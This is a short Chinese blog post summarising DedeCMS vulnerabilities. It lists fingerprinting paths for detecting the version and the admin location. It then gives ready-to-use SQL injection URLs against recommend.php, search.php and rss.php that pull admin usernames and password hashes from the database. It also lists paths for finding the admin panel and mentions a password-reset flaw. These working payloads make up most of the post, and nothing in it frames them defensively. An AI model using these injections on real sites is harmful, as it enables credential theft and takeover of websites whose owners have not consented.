我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829

dedecms漏洞总结

1.  判断升级时间:  /data/admin/ver.txt

2. 判断版本 /plus/guestbook.php 查看底部版权。

3. 判断是不是dede佐证  data/admin/allowurl.txt

4. 判断后台路径  /data/mysql_error_trace.inc

漏洞一:  /plus/recommend.php文件注入漏洞

/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=’ or mid=@`’` union select 1,2,3,(select concat(0x7c,userid,0x7c,pwd) from `%23@__admin` limit 0,1),5,6,7,8,9%23@`’`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type]=11

通过修改limit参数便可遍历后台账号密码,把表admin改为member便可查看前台账号密码

漏洞二: plus/search.php注入漏洞

POC 测试 /plus/search.php?keyword=as&typeArr[uNion]%20=a

如反馈是:Safe Alert: Request Error step 1!

/plus/search.php?keyword=as&typeArr[111%3D@`’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`’`+]=a

如反馈是:Safe Alert: Request Error step 2!

/plus/search.php?keyword=as&typeArr[111%3D@`’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`’`+]=a

漏洞三: 后台路径突破

老版本通过访问如下路径可能直接跳转后台登录,5.7版本一般会要求输入后台地址进行跳转

include/dialog/select_images.php
include/dialog/select_soft.php
include/dialog/config.php
include/dialog/select_soft.php?activepath=/include/FCKeditor
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p

也可以利用/tags.php进行暴力破解,如下python脚本: dedecms

漏洞四: Dedecms 5.6 rss注入漏洞

plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND “‘” AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#’][0]=1

其它老版本漏洞总结: https://blog.csdn.net/gmnet/article/details/7304743

漏洞五:前台任意用户密码重置

  需要member 开启

https://www.cnblogs.com/v1vvwv/p/DEDECMS_Vulnerability_Summary.html

 

 

转载请著名来源:天天小站 » dedecms漏洞总结

分享到:更多 ()